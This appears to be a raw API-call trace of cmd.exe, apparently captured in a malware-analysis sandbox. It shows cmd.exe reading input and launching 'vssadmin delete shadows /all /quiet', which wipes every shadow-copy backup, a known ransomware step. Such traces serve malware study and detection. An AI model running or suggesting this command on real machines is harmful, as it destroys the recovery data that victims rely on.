SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.841] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.841] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.841] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.841] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.841] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.841] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.841] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] GetFileType (hFile=0xe8) returned 0x3 [0264.841] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.841] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.841] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.841] GetFileType (hFile=0xf4) returned 0x3 [0264.841] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.841] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0264.841] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x26fa68, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26fa68*=0x24, lpOverlapped=0x0) returned 1 [0264.841] GetProcessHeap () returned 0x2d0000 [0264.841] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2f1010 [0264.842] GetProcessHeap () returned 0x2d0000 [0264.842] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1010 | out: hHeap=0x2d0000) returned 1 [0264.842] GetProcessHeap () returned 0x2d0000 [0264.842] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2e9840 [0264.842] GetProcessHeap () returned 0x2d0000 [0264.842] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x22) returned 0x2e4630 [0264.842] GetProcessHeap () returned 0x2d0000 [0264.842] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x48) returned 0x2f0090 [0264.842] GetConsoleOutputCP () returned 0x4e3 [0264.843] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a19bfe0 | out: lpCPInfo=0x4a19bfe0) returned 1 [0264.843] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0264.843] GetConsoleTitleW (in: lpConsoleTitle=0x26fa20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eaae0 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x5a) returned 0x2e9a50 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x420) returned 0x2eb9a0 [0264.843] SetErrorMode (uMode=0x0) returned 0x0 [0264.843] SetErrorMode (uMode=0x1) returned 0x0 [0264.843] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2eb9b0, lpFilePart=0x26f2b0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f2b0*="system32") returned 0x13 [0264.843] SetErrorMode (uMode=0x0) returned 0x1 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2eb9a0, Size=0x4a) returned 0x2eb9a0 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb9a0) returned 0x4a [0264.843] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0264.843] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x104) returned 0x2e5bb0 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1f8) returned 0x2eba00 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2eba00, Size=0x106) returned 0x2eba00 [0264.843] GetProcessHeap () returned 0x2d0000 [0264.843] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eba00) returned 0x106 [0264.844] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0264.844] GetProcessHeap () returned 0x2d0000 [0264.844] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe8) returned 0x2e9c60 [0264.844] GetProcessHeap () returned 0x2d0000 [0264.844] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9c60, Size=0x7e) returned 0x2e9c60 [0264.844] GetProcessHeap () returned 0x2d0000 [0264.844] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9c60) returned 0x7e [0264.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x26f020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f020) returned 0x2e5cc0 [0264.844] FindClose (in: hFindFile=0x2e5cc0 | out: hFindFile=0x2e5cc0) returned 1 [0264.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x26f020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f020) returned 0xffffffffffffffff [0264.844] GetLastError () returned 0x2 [0264.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f020) returned 0x2f1040 [0264.844] FindClose (in: hFindFile=0x2f1040 | out: hFindFile=0x2f1040) returned 1 [0264.844] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0264.844] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0264.844] GetConsoleTitleW (in: lpConsoleTitle=0x26f570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0264.844] GetProcessHeap () returned 0x2d0000 [0264.844] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x21c) returned 0x2ebb20 [0264.844] GetConsoleTitleW (in: lpConsoleTitle=0x2ebb30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0264.844] GetProcessHeap () returned 0x2d0000 [0264.844] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2ebb20, Size=0xa2) returned 0x2ebb20 [0264.844] GetProcessHeap () returned 0x2d0000 [0264.844] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb20) returned 0xa2 [0264.844] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0264.845] GetProcessHeap () returned 0x2d0000 [0264.845] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb20 | out: hHeap=0x2d0000) returned 1 [0264.845] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f328, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f2e8 | out: lpAttributeList=0x26f328, lpSize=0x26f2e8) returned 1 [0264.845] UpdateProcThreadAttribute (in: lpAttributeList=0x26f328, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f2d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f328, lpPreviousValue=0x0) returned 1 [0264.845] GetStartupInfoW (in: lpStartupInfo=0x26f440 | out: lpStartupInfo=0x26f440*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0264.845] GetProcessHeap () returned 0x2d0000 [0264.845] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e4660 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0264.845] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0264.846] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0264.846] GetProcessHeap () returned 0x2d0000 [0264.846] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4660 | out: hHeap=0x2d0000) returned 1 [0264.846] GetProcessHeap () returned 0x2d0000 [0264.846] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e9ac0 [0264.846] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x26f360*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f310 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x26f310*(hProcess=0x50, hThread=0x54, dwProcessId=0x670, dwThreadId=0x674)) returned 1 [0264.853] CloseHandle (hObject=0x54) returned 1 [0264.853] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0264.853] GetProcessHeap () returned 0x2d0000 [0264.853] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ef4e0 | out: hHeap=0x2d0000) returned 1 [0264.853] GetEnvironmentStringsW () returned 0x2e89c0* [0264.853] GetProcessHeap () returned 0x2d0000 [0264.853] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb22) returned 0x2ee9b0 [0264.853] FreeEnvironmentStringsW (penv=0x2e89c0) returned 1 [0264.853] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x26ec18, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x26ec18, ReturnLength=0x0) returned 0x0 [0264.853] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffd7000, lpBuffer=0x26ec50, nSize=0x380, lpNumberOfBytesRead=0x26ec10 | out: lpBuffer=0x26ec50*, lpNumberOfBytesRead=0x26ec10*=0x380) returned 1 [0264.853] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0267.686] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f258 | out: lpExitCode=0x26f258*=0x2) returned 1 [0267.686] CloseHandle (hObject=0x50) returned 1 [0267.686] _vsnwprintf (in: _Buffer=0x26f4c8, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f268 | out: _Buffer="00000002") returned 8 [0267.687] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0267.687] GetProcessHeap () returned 0x2d0000 [0267.687] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee9b0 | out: hHeap=0x2d0000) returned 1 [0267.687] GetEnvironmentStringsW () returned 0x2e89c0* [0267.687] GetProcessHeap () returned 0x2d0000 [0267.687] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb22) returned 0x2ee9b0 [0267.687] FreeEnvironmentStringsW (penv=0x2e89c0) returned 1 [0267.687] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0267.687] GetProcessHeap () returned 0x2d0000 [0267.687] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee9b0 | out: hHeap=0x2d0000) returned 1 [0267.687] GetEnvironmentStringsW () returned 0x2e89c0* [0267.687] GetProcessHeap () returned 0x2d0000 [0267.687] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb22) returned 0x2ee9b0 [0267.687] FreeEnvironmentStringsW (penv=0x2e89c0) returned 1 [0267.687] GetProcessHeap () returned 0x2d0000 [0267.688] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2d0000) returned 1 [0267.688] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f328 | out: lpAttributeList=0x26f328) [0267.688] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0267.688] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.688] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0267.688] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.688] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a18e194 | out: lpMode=0x4a18e194) returned 0 [0267.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.689] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a18e198 | out: lpMode=0x4a18e198) returned 0 [0267.689] GetConsoleOutputCP () returned 0x4e3 [0267.689] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a19bfe0 | out: lpCPInfo=0x4a19bfe0) returned 1 [0267.689] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9c60 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eba00 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bb0 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb9a0 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9a50 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eaae0 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0090 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4630 | out: hHeap=0x2d0000) returned 1 [0267.689] GetProcessHeap () returned 0x2d0000 [0267.689] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9840 | out: hHeap=0x2d0000) returned 1 [0267.690] _vsnwprintf (in: _Buffer=0x4a1a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f788 | out: _Buffer="\r\n") returned 2 [0267.690] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.690] GetFileType (hFile=0xf4) returned 0x3 [0267.690] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.690] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0267.690] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f758, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26f758*=0x2, lpOverlapped=0x0) returned 1 [0267.690] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0267.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a19c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0267.690] _vsnwprintf (in: _Buffer=0x4a18eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f798 | out: _Buffer="C:\\Windows\\system32") returned 19 [0267.690] _vsnwprintf (in: _Buffer=0x4a18eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x26f798 | out: _Buffer=">") returned 1 [0267.690] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.690] GetFileType (hFile=0xf4) returned 0x3 [0267.690] _get_osfhandle (_FileHandle=1) returned 0xf4 